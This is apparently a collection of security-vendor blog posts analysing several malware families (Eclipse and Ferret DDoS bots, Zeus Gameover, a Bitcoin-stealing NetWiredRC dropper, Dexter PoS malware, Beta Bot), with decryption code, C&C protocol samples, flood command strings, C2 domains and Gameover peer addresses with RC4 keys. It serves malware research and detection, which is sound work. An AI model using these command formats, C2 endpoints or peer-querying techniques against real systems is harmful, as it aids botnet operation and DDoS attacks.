Trojan.Eclipse — A Bad Moon Rising?

By: Dennis Schwarz -

ASERT’s malware collection and processing system has automatic heuristics that bubble up potentially new and interesting DDoS malware samples into a “for human analysis” queue. A recent member of this queue was Trojan.Eclipse and this post is my analysis of the malware and its associated campaigns.

Analysis was performed on the sample with an MD5 of 0cdd10cd3393d3fe916a55b946c10ad6.

The name Eclipse comes from two places: a mutex named “eclipseddos” and a hardcoded Cookie value used in the command and control (C2) phone home. We’ll see in the Campaign section below that this threat is also known as: shadowbot, gbot3, eclipsebot, Rhubot, and Trojan-Spy.Win32.Zbot.qgxi.

Based on the C2 domain names, GeoIP of the C2 IP addresses, and a social media profile of the owner of one of the C2 domains, I suspect this malware to be Russian in origin. In addition, Eclipse is written in Delphi and empirically Russian malware coders have a certain fondness for this language.

Command and Control

The analyzed binary has a hardcoded C2 domain string. This string is protected from modification by running it through a simple hashing algorithm and comparing it against a hardcoded hash at certain points of the code. The following Python function replicates this algorithm:

 def decrypt(string):
    table1 = "qwertyuiopasdfghjklzxcvbnm.1234567890"
    table2 = "asdfghjklqwertyuiopnbmcvxzeasdfghjklv" 
    out = ""
    for orig_char in string:
        index = table1.find(orig_char)
        if index == -1:
            char = orig_char
        else:
            char = table2[index]
        while char in table1[index:]:
            index = table1.find(char)
            char = table2[index]
        out += char

    print out

For example, the domain “milfsdeasing.com” hashes to “zopterrweoxyezpz.”

An example phone home request looks like this:

phonehome

It is a HTTP GET based C2 protocol where the query string breaks down into the following parameters:

  • bot – 15 random lowercase letters and digits
  • botkey – possibly a hardcoded campaign key
  • os – OS name
  • ram – amount of RAM
  • user – username
  • cpu – estimated CPU speed
  • number of CPUs

After the Host line, the remaining headers are static—note the aforementioned Cookie value. An example phone home response looks like this:

response

The returned content is a single <base> tag containing base64-encoded data. Once decoded, an XML-like configuration file emerges (newlines added for clarity):

<cmd>stop;</cmd><tcp>GET /index.php HTTP 1.1
Host: $RANDOM$.net
User-agent: $RANDOM$
</tcp><cnfg>control-timeout=1;
control-path=/par/;
control-domain=milfsdeasing.com;
stream-timeout=10;</cnfg>

Another example:

<cmd>type=slow-post; threads=10; timeout=1;
 target=www.victim.com; script=/contact-us.php;
port=80;</cmd><tcp>GET /index.php HTTP 1.1
Host: $RANDOM$.net
User-agent: $RANDOM$
</tcp><cnfg>control-timeout=1;
control-path=/par/;
control-domain=milfsdeasing.com;
stream-timeout=10;</cnfg>

Relatively speaking, for a DDoS bot, Eclipse has a fairly rich configuration mechanism. Starting with the <cnfg> tag, it has four possible options:

  • control-timeout – set C2 poll time
  • control-path – set C2 pathname
  • control-domain – set C2 domain
  • stream-timeout – minimum wait time between attack packets, in milliseconds

The <cmd> tag can contain multiple commands delimited by a “\r\n”, and each command has three possible formats: standalone command, command requiring parameters, and a shortcut command. An example of the first format is:

<cmd>stop;</cmd>

Identified commands in this category are:

  • stop – stop attacks
  • wait – sleep for one day
  • die – exit process

An example of the second format:

<cmd>type=slow-post; threads=10; timeout=1; target=www.victim.com; script=/contact-us.php; port=80;</cmd>

There are a bunch of types, here are the ones identified:

  • update – update self
  • execute – download and execute
  • tcpint – custom TCP flood
  • browser – HTTP GET flood, look like a web browser
  • dirtjumper – HTTP GET flood
  • sincere – TCP flood
  • http – HTTP GET/POST flood
  • httpspoof – HTTP GET flood with spoofed X-Forwarded-For header
  • slowloris – broken Slowloris attempt
  • tcp – TCP flood
  • udp – UDP flood
  • http-data – HTTP POST flood
  • slow-post – broken slow HTTP POST flood
  • connect – TCP connect flood
  • tcp-oneconnect – TCP flood
  • icmp – broken ICMP echo request flood
  • http-post – referenced in the code, but not implemented

Command parameters depend on the type and include:

  • threads – number of attack threads, defaults to 30
  • timeout – wait time between attack packets, in milliseconds
  • target – target host
  • script – URI path and file
  • port – target port, defaults to 80
  • connint – unknown, defaults to 1
  • dataint – unknown, defaults to 1
  • data – referenced, but unused
  • template – template attacks

Two interesting features here. First, the script parameter can contain variables: $RANDOM$ is replaced with 15 random lowercase letters and digits and $INTEGER$ is replaced with a random integer between 0 and 998.

Second, the template option configures various attacks based on hardcoded templates. They include:

  • nginx – slowloris attack, 30 threads, 10 ms timeout
  • ssh – tcp attack, 45 threads, 10 ms timeout, destination port 22
  • ftp – tcp attack, 45 threads, 10 ms timeout, destination port 21
  • https – tcp attack, 70 threads, 10 ms timeout, destination port 443
  • dns – udp attack, 10 threads, 10 ms timeout, destination port 53

Finally, the shortcut command format looks like this:

<cmd>#http://www.shortcut-victim.com#</cmd>

This launches an http attack with 100 threads and a timeout of 10 ms.

The <tcp> tag is used in conjunction with the tcpint command and defines a custom TCP flood payload template. The template supports $RANDOM$ variables which are replaced with 15 random lowercase letters and digits.

Campaigns

Campaign-wise, Eclipse can be broken down into roughly four groups: shadowbot, gbot3, eclipsebot, and eclipseddos. The malware implementation used in each campaign varies a bit from what was describe above, but I feel that they’re earlier development versions and warrant being categorized under the same family name.

shadowbot Campaign

The shadowbot campaign was active from July 21, 2013 to August 10, 2013 (using VirusTotal’s first submission timestamp). Its name comes from the use of the shadowbot mutex. Other notable differences include:

  • Use of a shortened query string, “index.php?bot=”, in the C2 phone home
  • Missing Referer and Cookie headers in the C2 phone home
  • Does not use the <base> tag or base64 encoding
  • The <cmd> tag is much simpler and is delimited by “#”s
  • Does not use <cnfg> or <tcp> tags
  • Uses !random instead of $RANDOM$ variables
  • Smaller command set: connect, slow-post, http-data, cs, udp, tcp, and http

Some sample MD5s and C2 URLs:

4c76ed5155b2ee388bd770941a3c0473 http://aktualisieren-soft.ru/blizzer-kidala/index.php
0af74a0029b248b7c4b5129a1a0e5e3b http://teleon2.ru/paranoik/index.php
2596d7b324599240c723429a01ad7310 http://teleon2.ru/paranoik/index.php
dd384ead636a7bd9bf7aa870ae712963 http://teleon2.ru/new/index.php

 

The last entry in this table is the sample that Microsoft documented at http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan%3AWin32%2FRhubot.A. They have named the malware “Win32/Rhubot.A”, but to be honest I couldn’t figure out why or find any good source material on “Rhubot”.

gbot3 Campaign

Next is the gbot3 campaign, which was active from August 9, 2013 to January 1, 2014 VirusTotal time. Its name also comes from the mutex that it sets. The distinguishing features of this version are:

  • As with shadowbot, uses shortened C2 phone home query string, “index.php?bot=”
  • Does not use base64 encoding, but does contain <cmd>, <cnfg>, and <tcp> tags
  • <cmd> is space delimited and still fairly basic
  • Implements “#” shortcut command
  • Implements tcpint command with <tcp> template. The template supports !randomchar, !random-ug, !random-lang, !random-encoding, !random-ac, !random-accept variables instead of $RANDOM$
  • Supports !random instead of $RANDOM$ in URI
  • Command set includes the more novel tcpint, browser, dirtjumper, slow-post, and tcp-oneconnect commands

Some sample MD5s and C2 URLs:

08f89357dc85b9155600a45e2a7a8e7b http://91.226.127.175/test1/index.php
1720907230f0d4e4b6cda96dd52322dc http://91.226.127.175/test1/index.php
ad8ac73540708d5cd6738a5d5f23a1d5 http://tryboots.ru/asdfgh/index.php

 

The last entry in this table is the sample referenced in SourceFire VRT’s “MALWARE-CNC Win.Trojan.Rhubot variant outbound connection” rule.

eclipsebot campaign

Third is the eclipsebot campaign, which was active from September 12, 2013 to November 4, 2013. Naming is based on the mutex. Sans some minor changes, this version is very similar to the eclipseddos analyzed in the beginning of the post. Notable features are:

  • Introduction of C2 domain hash check
  • Still uses shortened C2 query string, “index.php?bot=”
  • Introduction of rich <cmd> configuration via type, threads, timeout, target, script, etc. options
  • Has support for attack templates
  • Uses $RANDOM$ and $INTEGER$ variables

Some sample MD5s and C2 URLs:

ab6d483b2d6adf510e07395ceea5b980 http://blog32.ru/wp-admin/dark/index.php
b4e55f09ba681c10c20c50453c85652f http://blog32.ru/wp-admin/dark/index.php

 

eclipseddos campaign

The eclipseddos campaign has been active since November 28, 2013 VirusTotal time.

Some sample MD5s and C2 URLs:

c6cdd4876771f18efade928c50cf81fa http://milfsdeasing.com/par/index.php
548fbf4dde27e725c0a1544f61362b50 http://vsehnahuy.com/huy/index.php
0b450a92f29181065bc6601333f01b07 http:// test.crack-zone.ru/index.php

 

The last two samples in the above table are referenced in the Emerging Threats rule called “ETPRO TROJAN Trojan-Spy.Win32.Zbot.qgxi Checkin”. As with Microsoft’s AV detection, I couldn’t find any source material on why they decided to name it this way.

The Trojan.BlackRev Connection

Back in May 2013, I released a blog post titled “The Revolution Will Be Written in Delphi” that profiled a DDoS bot named Trojan.BlackRev. Since that post, there have been a few updates that provide for a preamble to a possible relationship between Eclipse and BlackRev. On June 5, 2013 the author of BlackRev, going by the handle “silence”, posted to an underground forum saying that he had sold the project:

blackrev_sold

A few months later on October 4, 2013 on another underground forum, somebody going by the handle “chef” leaked the BlackRev source code:

leak

While tracing one of the Eclipse C2 URLs from the shadowbox campaign:

http://aktualisieren-soft.ru/blizzer-kidala/index.php

I came across a C2 URL with a similar URI pathname:

http://aktualisieren-soft.ru/blizzer/panel/gate.php

The complete C2 protocol looks like this:

blackrev-eclipse-c2

This traffic came from a binary with an MD5 of 8da35de6083aa9aa3859ce65e0e816df and I believe this sample to be a “missing link” between the BlackRev and Eclipse code bases.

In addition to the timeline proximity and the feeling of “code sameness” while reversing engineering, some of the major pieces linking this variant to BlackRev are:

  • The query string used in the phone home
  • Comparison against the “|stop|” string
  • Bot command is pipe “|” delimited
  • Launches the same “bot killer” code in a thread
  • Launches the same “memory reduction” code in a thread
  • Uses a similar random character generator
  • HTTP header overlap in some of the attacks
  • Names a command “antiddos”, which is fairly novel

The major pieces linking it to Eclipse (shadowbot specifically) are:

  • Shared C2 infrastructure
  • HTTP header overlap in the C2 phone home
  • Use of XML-like tags in the phone home response
  • Names a command “nginx”, which is a fairly novel
  • Eclipse variants also contain the same bot killer, memory reduction, and similar random character generation code
  • Name overlap in some of the attacks
  • HTTP header overlap in some of the attacks

With silence’s claim of selling the project and the leak of the source code to the public, it is unclear how or if the threat actors behind the Eclipse and BlackRev campaigns are related. I do feel strongly though that Eclipse is a descendant of the BlackRev code base.

Conclusion

This post has been an analysis of the Trojan.Eclipse family of DDoS bots. This malware is interesting because it has a fairly rich configuration mechanism, some novel attack types, and a nice development trail leading back to the either the Trojan.BlackRev code leak or sale of the project by the author.

ASERT is just ramping up attack monitoring of this family. So far we’ve seen a handful of attacks on a consumer complaint website, a venture capital company, a forum for a Russian town, and a rating site for Russian apartment repairs. Monitoring of the attacks and family continue.

Pretending to be a Zeus Gameover Bot

By: Dennis Schwarz -

Zeus Gameover is a banking trojan that started appearing in the wild sometime in early 2012. As with Citadel, Ice IX, and KINS, it is based on the leaked Zeus trojan source code. The most significant difference between Gameover and its immediate family members is that it uses a peer-to-peer (P2P) network for its command and control (C&C). What also stands out is that there appears to be only one instance of the Gameover botnet, whereas Citadel for example has hundreds of distinct ones.

This post releases some proof of concept code (read: works for me) that helps malware researchers to further understand and also interact with Gameover. More specifically it:

  • Extracts the initial set of P2P peers (starter peers) from a Gameover memory dump
  • Queries each of the starter peers for their “P2P network configuration” file
  • Decrypts and partially parses the configuration into something more human readable
  • Enumerates part of the P2P network

Prior Work

The code is meant to complement the existing body of Gameover malware research. It takes bits and pieces from the following sources and ties them together into something a bit more tangible:

Much appreciation goes to these folks and their work.

Code Availability

Python code will be available on Arbor Network’s GitHub. It depends on the pefile Python module and requires a Gameover memory dump to operate on. The dump used in this demonstration came from a sample that has a MD5 of 216b53fe8c704978468e8bfe1aad1152.

Please note that this is a live malware sample and the code has the ability to connect to and query a live malware C&C network! Stay safe.

Demonstration and Walk-Through

The walk-through data is initialized via:

>>> fp = open(“AML-12420355.rsrc-52307867.dynamic.memdump”, “rb”)
>>> memdump = fp.read()
>>> fp.close()
>>>
>>> from ZeusGameover import ZeusGameover
>>> gameover = ZeusGameover(memdump)

or

$ python ZeusGameover.py AML-12420355.rsrc-52307867.dynamic.memdump

First off, a hardcoded “sample configuration” file is extracted from the memory dump and de-XOR’d with a key stored in the relocation section (.reloc) of the binary (see the get_memdump_config function). This configuration file contains an RC4 key state used later to decrypt the “P2P network configuration” file:

>>> rc4_key = gameover.get_memdump_rc4_key()
>>> print “”.join(rc4_key).encode(“hex”)
a30a0c0f383c42509cf83a0523624520a8c11a7517bab7d97e04dae94bbc390d5a445d6341823b36cc37eab399aed7c3538a1edb847bd8004f5beb4a73e310f1a5e8ec09aff60131f0c4199a3d7f6fc8695c91f416925598ca6e646da243abd29661a971c7fc97b478062d8ef2e5ad2a7c5efb0ebf02d09db8cf47ee80677a4d2ebd0b727487d1039f891c59f326609340d3aa3522cedf28159ba0c2a4b6883ee2496518beefd427b025b1ac1fa61d338ff96c1b7766d632cdfe12b2c034865f30eddcf7dec9e468c548d5297657bb588d4ca1905424ff4ee16b8be0832f94796a95857d9e81e67051fdcbe752fa2c07b91446112ba7088c21ddc6b5f556133f0000

The “sample configuration” file also contains the starter peers used to bootstrap communications with the P2P network (see the get_static_peers function):

static peer #1
ip: 74.96.168.126, udp port: 6710, rc4 key: c2056f859dd9fdf008507a637a0da568d16f825b

static peer #2
ip: 74.203.254.118, udp port: 6630, rc4 key: c046b43fbcec2475831083aa56aef3d5b72ceda6

static peer #3
ip: 70.30.53.56, udp port: 8204, rc4 key: a398bc30c436194c025513cb4bcafc1287460293

Using their respective UDP ports and RC4 keys, each of the starter peers is sent a “version” query to see if the peer is still alive. If so, the query will return version information and a TCP port (see the query_peer_for_version function):


static peer #8
ip: 85.100.41.9, udp port: 8835, rc4 key: d6c0d41b51dcb4b76205f3ab00f50af4411a22b9
binary version: 70314355, config version: 76101317, tcp port: 2997

If the TCP port is active, it is queried for the “P2P network configuration” file (see the query_peer_for_config and parse_config_response functions):


static peer #9
ip: 94.247.29.186, udp port: 3415, rc4 key: a5f5957b3acc687da57e5287837ea70c9ef827f6
binary version: 70314355, config version: 76101317, tcp port: 4948
config saved (1033680 actual bytes)

The “P2P network configuration” file is decrypted with the RC4 key state from above and lightly parsed. Parsing includes de-XORing and, if necessary, zlib decompressing the individual data “sections” of the config (see the parse_config function):

$ strings 94.247.29.186.config

[start item number: 22003, type: 0x10000001, packed size: 854, unpacked size: 2201]
@https://bancopostaimpresaonline.poste.it/bpiol/lastFortyMovementsBalance.do?method=loadLastFortyMovementList
@https://*.tecmarket.it/*
@https://www3.csebo.it/*
@https://qweb.quercia.com/*

[start item number: 2, type: 0x40000000, packed size: 36, unpacked size: 36]

http://kessura.com/php/s_c.php

[end item number: 2]
[start item number: 3, type: 0x40000000, packed size: 36, unpacked size: 36]

http://kessura.com/php/g_c.php


[start item number: 14, type: 0x40000001, packed size: 196, unpacked size: 298]
ERCPQ
inject
<script type=”text/javascript” src=”scripts/service?id=7″ language=”JavaScript”></script>S
ERCPM
inject
style=’visibility:hidden’
[end item number: 14]

Over time, the “P2P network configuration” can be queried via new Gameover samples and a timeline of when changes are made and where those changes are start to appear:

gameover_configs

$ diff -u jan_25.config.strings jan_28.config.strings
— jan_25.config.strings 2014-01-29 15:59:54.000000000 -0500
+++ jan_28.config.strings 2014-01-29 15:59:41.000000000 -0500

[start item number: 1, type: 0x40000000, packed size: 39, unpacked size: 39]
-http://nessura.com/oz/service.php
+http://kessura.com/oz/service.php
[end item number: 1]

In addition to the configuration data, the starter peers can be used to further enumerate the P2P network (see the enumerate_peers function):


peer #21
ip: 115.162.112.200, udp port: 5782, rc4 key: d29e52a567b266b53c8269433c5462c2cf0c4fdd

peer #22
ip: 64.25.199.1, udp port: 6977, rc4 key: d75dfdb4f96e623546940e8a8c03872e07eed9d2

peer #88
ip: 99.190.124.179, udp port: 1671, rc4 key: d3526a00abf536c6a1df7d8607c9635c0bd98dc1

peer #89
ip: 153.160.176.252, udp port: 4714, rc4 key: d27382dbec8a01a3c4b405e063a1c10267313d19

From a set of twenty starter peers and using a breadth first search an interesting pattern emerges:

breadth_first

This graph shows how many total unique peers are at each level of the enumeration. While this certainly does not represent the entire Gameover P2P network, it does start to give an idea of its size and scope. Thanks to Kenny MacDermid for the above idea and help on the visual.

Conclusion

Zeus Gameover is a banking trojan that has been around for a couple of years now. It continues to be very active and as of this writing is in ASERT’s top five of tagged malware samples. This is interesting because Gameover is also a well-researched malware family. Usually the longer a family exists and the more focus the malware research community gives it, the less active the malware becomes. But, Gameover continues to be in the limelight and continues to infect and affect a large number of people and companies across the Internet.

This post hopes to complement and further the existing malware research into Gameover. In addition, it hopes to also assist enterprises and service providers to detect and mitigate infected peers and banks and financial institutions to determine if and how they are being targeted.

A Business of Ferrets

By: Dennis Schwarz -

Trojan.Ferret appeared on my radar thanks to a tweet by @malpush. The tweet revealed a URL that at the time of this writing was pointing to a command and control (C&C) panel that looked like this:

login

The logo alone convinced me to study this business of ferrets further. Coincidentally (for Arbor), it turns out that this malware is a DDoS bot.

Malware Sample

The sample analyzed can be found at malwr (MD5: 4fa91b76294d849d01655ffb72b30981).

It is written in Delphi and plays the following malware games: UPX packing, string obfuscation, anti-virtual machine, anti-debugging, self-modifying code, and process hollowing.

Based on the Delphi usage and the language used for part of the panel, this bot is likely of Russian origin.

Obfuscations

Trojan.Ferret uses two methods of obfuscation; both are a combination of base64 and XOR. Different keys are used for various sections. The first obfuscation method is used mostly for strings and can be decrypted with the following Python function:

def decrypt_strings(msg, key):
  msg_no_b64 = base64.b64decode(msg)

  plain_buf = []
  for i in range(len(msg_no_b64)):
    key_lsb = ord(key[i % len(key)]) & 0xf
    msg_lsb = ord(msg_no_b64[i]) & 0xf

    c = msg_lsb ^ key_lsb
    d = c ^ 0xa

    msg_slsb = ord(msg_no_b64[i]) & 0xf0
    plain_byte = msg_slsb ^ d

    plain_buf.append(chr(plain_byte))

  return "".join(plain_buf)

Here are some examples:

>>> decrypt_strings("QG1wZ2xnPj4sZGNk", "12xc3qwfhjeryTTYHH")
'Kernel32.dll'

>>> decrypt_strings("TG12RGZveGBnSG5mZ2JrQg==", "12xc3qwfhjeryTTYHH")
'GetModuleHandleA'

>>> decrypt_strings("dWpkbXFqZmxi", "mu#X")
'removeone'

>>> decrypt_strings("cn9tY3Nqf2d1", "mu#X")
'updatever'

>>> decrypt_strings("ZXN8djotITgyOyQ0MD4mOD45Jzc5I2NmfS1kaXhzdCx+YXo=", "GMrlZ8t3pypO3423423LpFqCUx")
'http://188.190.101.13/hor/input.php'

The second method is used mostly for C&C communications and can be cleaned up with the following Python function:

def decrypt_cnc(msg, key):
  msg_no_b64 = base64.b64decode(msg)

  plain_buf = []
  for offset, enc_byte in enumerate(msg_no_b64):
    plain_byte = ord(enc_byte) ^ ord(key[offset % len(key)])
    plain_buf.append(chr(plain_byte))

  return "".join(plain_buf)

Here are some examples:

>>> decrypt_cnc("ChYJCRhta3k=", "x38")
'2.11 USA'

>>> decrypt_cnc("DRhAAA4YeRgIXBgIUBgPVRgKAEs=", "x38")
'5 x86 A 0d 0h 7m 28s'

Command and Control

C&C is HTTP based. Two message types have been identified. The first is message type 0 or the “phone home” and looks like:

POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://mhome.br
Content-Length: 106
Content-Type: application/x-www-form-urlencoded

m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ==&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs=

Here’s what it looks like decrypted:

m=0&h=18803769021711750776216376939&p=HOME&v=2.11 USA&s=5 x86 A 0d 0h 7m 28s

Its POST parameters are:

  • m – Message type (0)
  • h – Hash based on computer name
  • p – Computer name
  • v – Version and locale
  • s – Windows version, architecture, user type, and uptime

The phone home response looks like:

HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 14:48:27 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 32
Connection: close
Content-Type: text/html; charset=UTF-8

dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN

Decrypted, it is the User-Agent used in the request:

>>> decrypt_cnc("dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN", "x38")
'Mozilla Gecko Firefox 25'

The second message type is 1 or “poll for commands”. It looks like:

POST /hor/input.php HTTP/1.0
Host: 188.190.101.13
User-Agent: Mozilla Gecko Firefox 25
Accept: text/plain
Accept-Encoding: identity
Accept-Language: en-EN,en
Connection: Close
Referer: http://udot.tk
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

m=CQ==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=

And here it is decrypted:

m=1&h=18803769021711750776216376939

Its POST parameters are:

  • m – Message type (1)
  • h – Hash based on computer name

An example poll response is:

HTTP/1.1 200 OK
Date: Wed, 04 Dec 2013 12:56:16 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 72
Connection: close
Content-Type: text/html; charset=UTF-8

UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=

Decrypted:

>>> decrypt_cnc("UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=", "x38")
'httpflood*http://target.net/index.php/*80*150*0'

Commands are delimited by “*”s and are formatted like:

command*arg1*arg2*arg3*arg4*arg5*arg6*arg7

Commands

The following bot commands have been identified:

  • httpflood – HTTP GET flood
  • httppost – HTTP POST flood
  • udpflood – UDP flood
  • synflood – TCP connect flood
  • tcpflood – TCP flood
  • download – download and execute (all bots)
  • downloadone – download and execute (specified bot)
  • update – update (all bots)
  • updateos – update (specified OS)
  • updateone – update (specified bot)
  • updatever – update (specified version)
  • removeos – remove bot (specified OS)
  • removeone – remove bot (specified bot)
  • s! – stop all floods
  • su – stop UDP flood
  • sh – stop HTTP flood
  • ss – stop TCP SYN flood
  • st – stop TCP flood

More information about each command can be found in the “Task Management” section of the C&C panel:

tasks1

tasks2

Note: I didn’t see any references to the “memexec” or “script” commands in the analyzed binary.

C&C Panel

Wrapping up, here is a behind the scenes tour of the C&C panel; the “Statistic/Index” page:

index

Here is the “Uploads” page:

uploads

And, part of the “Bot List” page:

bots

Conclusions

This post has analyzed the crypto, C&C infrastructure, and command set of Trojan.Ferret—a new DDoS bot that is likely of Russian origin.  At the time of this writing only a handful of unique samples and C&C servers have been identified, so the scope and impact of the new threat is still uncertain. ASERT will continue to track this business of ferrets, and any other new businesses that arise.

Bitcoin Alarm – Bitcoin stealing spam

By: Kenny MacDermid -

The rise in Bitcoin values seems to have caused an equal increase of Bitcoin spam as malware authors attempt to make money off the many new market participants. One site that was spammed to me three times in one day is bitcoin-alarm.net. I ignored it the first two times, but they must have really wanted me to look at it, so who am I not to oblidge.

Bitcoin Alarm Logo

The site promises a tool to notify you of market changes by SMS, without ever mentioning any nefarious behaviour. YouTube videos teach you what Bitcoin is, and how to install this free tool.  They even provide a link so you can donate to the author, although it appears no one has chosen to do so. This I have to download.

BitcoinAlarm Icon

The download BitcoinAlarm.exe (MD5: edfa12d4a454b0eb786bbe92050ab88a) had just 1 hit on VirusTotal when I first scanned it (from Kaspersky). Is it a false positive on a nice free tool? Lets dig deeper.

The download is an installer. A quick strings didn’t turn up anything interesting, so lets try binwalk:

Binwalk Results - a rar archive
I carved out this RAR archive to see what it contains:

dd if=BitcoinAlarm.exe.virus of=out.rar bs=1 skip=756224
mkdir ext
unrar x out.rar ext/

Unrar results: an SFX script and 5 files.

There’s an SFX script run, lets see what it does:

CreateObject("WScript.Shell").Exec "winupdate.exe 5943564.IFW"

cat 7246235.vbe

A quick check of winupdate.exe with VirusTotal shows that it’s the valid (and non-malicious) AutoIt executable. AutoIt is a great little scripting language for Windows, it’s especially useful for automating GUI related tasks. So if winupdate.exe is AutoIt that would make 5943564.IFW an AutoIt script. It looks like it was obfuscated somewhat though:

a bunch of comments

head 5943564.IFW

Run it through

sed -e '/^;[0-9]/d'

to clean up the garbage and we end up with this script. It starts by checking if Avast is running and if so it sleeps for 20 seconds. I guess this is long enough for Avast to get bored and go look at something else:

if Avast, sleep for 20 seconds

Well, that’s certainly not a good sign. It’s a pretty solid chance that if software is checking for an antivirus engine that it’s up to no good. A scan of the rest of the file contains other interesting methods like “disable_uac”, “anti_hook”, “persistence”, “botkiller”, “downloader”, “disable_syste_restore”. It’s starting to look like Kaspersky was right, congrats on being the 1/49 to detect this.

I see a lot of calls to IniRead(), and they’re all reading 65901.PPZ. It looks like this is the configuration file. In contains:

[6404000]
6662859=9455413
[2244034]
6224525=3244993
[3206254]
5598349=4588436
[5378250]
6296134=4064234
[1109091]
1109091=asvep

Matching these to the script we see find the sections are:

# 6404000 == disable_uac()
# 2244034 == AdlibRegister("anti_hook", 500)
# 3206254 == AdlibRegister("persistence", 500)
# 5378250 == startup()
# 1109021 == $sKey

This crypto key is used in Main to decrypt and run the file 20070.RQT:

decrypt and run 20070.RQT with cryptkey

The easiest way to decrypt this file was to simply let the script do the work. There’s a lot of code outside of functions though, so care has to be taken to remove everything non-crypto related. Remove the _RunPE() and replace it with

FileWrite($uniscriptdir & "DECRYPTED", $sArquive)

The decrypted file had 30/48 hits of VirusTotal when I scanned it (MD5: 224c73f8172123e5ddca2302425664a6). It’s called NetWiredRC and is a remote access trojan made for stealing login information, and likely in this case being used to steal Bitcoins. It connect to bitcoins.dd-dns.de on port 3360.

Some choice credential related strings from the decrypted malware:

%sThunderbirdprofiles.ini
select *  from moz_logins
%s.purpleaccounts.xml
SoftwareMicrosoftInternet ExplorerIntelliFormsStorage2

This free utility is nothing more than malware with very low detection rate being spammed to anyone that might have a Bitcoin sitting around. When I checked the domain with urlvoid it had zero ‘bad’ reports and was not blacklisted. I’ve since submitted the domain to multiple scanners and it’s now detected by Scumware.

On a recheck BitcoinAlarm.exe’s detection is up to 14 of 49 scanners, and the download link appears to return 404. bitcoins.dd-dns.de is no longer answering on port 3360.

Never before has it been so easy to leave cash accessible from the Internet, so expect more malware to make off with your Bitcoin wallet. Bitcoins that are not in use should be moved off into cold storage, or donated to the human fund at 136K8a5Mb8uDguFb7RnoXz7gzBSe2xaEED (ahem, worth a shot right?).

Happy Holidays: Point of Sale Malware Campaigns Targeting Credit and Debit Cards

By: cwilson -

Inside Recent Point-of-Sale Malware Campaign Activities

Curt Wilson, Dave Loftus, Matt Bing

An active Point of Sale (PoS) compromise campaign designed to steal credit and debit card data using the Dexter and Project Hook malware has been detected. Indicators of compromise will be provided for mitigation and detection purposes. Prior to the publication of this Threat Intelligence document (embedded at the end of this post), members of the FS-ISAC, major Credit Card vendors and law enforcement were notified.

It appears that there are at least three distinct versions of Dexter:

  1. Stardust (looks to be an older version, perhaps version 1)
  2. Millenium (note spelling)
  3. Revelation (two observed malware samples; has the capability to use FTP to exfiltrate data)

In early November 2013, ASERT researchers discovered two servers hosting Dexter and other POS malware to include Project Hook.  The Dexter campaign looks more active, especially in the Eastern Hemisphere and therefore shall be the main focus herein. Dexter, first documented by Seculert in December 2012, is a Windows-based malware used to steal credit card data from PoS systems. The exact method of compromise is not currently known, however PoS systems suffer from the same security challenges that any other Windows-based deployment does. Network and host-based vulnerabilities (such as default or weak credentials accessible over Remote Desktop and open wireless networks that include a PoS machine), misuse, social engineering and physical access are likely candidates for infection. Additionally, potential brittleness and obvious criticality of PoS systems may be a factor in the reportedly slow patch deployment process on PoS machines, which increases risk. Smaller businesses are likely an easier target due to reduced security. While the attackers may receive less card data from smaller retailers, infections may be more numerous and last longer due to the lack of security reporting and security staff in such environments.

Figure 1: Dexter (Purple) and Project Hook (Orange) infections in the Eastern Hemisphere

Dexter and Project Hook infections in the eastern hemisphere

Figure 2: Dexter (Purple) and Project Hook (Orange) infections in the western hemisphere

Screen Shot 2013-12-03 at 1.22.00 AM

For the full document to include a list of various compromise indicators and information about the back-end infrastructure, please download the full public report -

Dexter and Project Hook Break the Bank

 

Beta Bot – A Code Review

By: Kenny MacDermid -

Introduction

The basics on Beta Bot was covered by Limor Kessem on the RSA blog. As a quick feature summary:

dHXoLtl

Unlike Mrs. Kessem’s conclusion, I wouldn’t classify Beta Bot as a banking trojan. To me it’s a banking trojan only in the same way a keylogger is a banking trojan. It does contain code to grab POSTed forms, but as the blog post mentions there’s no code to inject javascript into web pages, and nothing that would bypass a banks 2-factor authentication. Plus on the “Form grabber” configuration page is the warning: * Banking fraud is not condoned. We discourage you from committing any type of fraud with this feature. Who wouldn’t listen to that?

Beta Bot sales are being handled by “Lord Huron,” although “betamonkey” appears to be the author.

In this post, I hope to cover how Beta Bot uses encryption, how it stores its configuration, and provide a tool to extract it. The code is available in our GitHub repository and works with some raw files and memory dumps from Beta Bot versions 1.0.2.5 and 1.5.

Hashed APIs

Using hashes to hide the actual imports is a fairly common malware trick. Beta Bot uses the Aldr-32 (http://en.wikipedia.org/wiki/Adler-32) algorithm and hashes the: dll_name + "." + function_name.

api_hash

The DLL names are stored in the binary so it’s easy to iterate all the exports to create the hashes. The code links certain hashes to certain DLLs, but even without following the code you get only a couple of collisions, and it’s pretty clear which the correct function is.

Included in GitHub is a script to set the correct names for new samples.

Hidden Code

Beta Bot uses multiple layers of cryptography. The code that decrypts the configuration data is itself encrypted and stored in the binary. This hidden code is 550 bytes. The code verifies that the XOR of the last two bytes of the encrypted code is 0×63. It’s encrypted with RC4 using the hardcoded key 1E82B25C33.

This code is decrypted and started in a new thread with the address of the encrypted configuration and the encryption key passed in:

code

Using the crypto key the global configuration structure is decrypted using RC4 and pointers are set in the global main structure/class.

The inside_crypto_key is used to decrypt the configuration and is setup in the main global structure early in the bot setup. It points to a block of 32 bytes in the .data section. Inside the hidden code, every second byte is used to build the real key used to decrypt the encrypted configuration. The rest of the bytes appear unused.

key

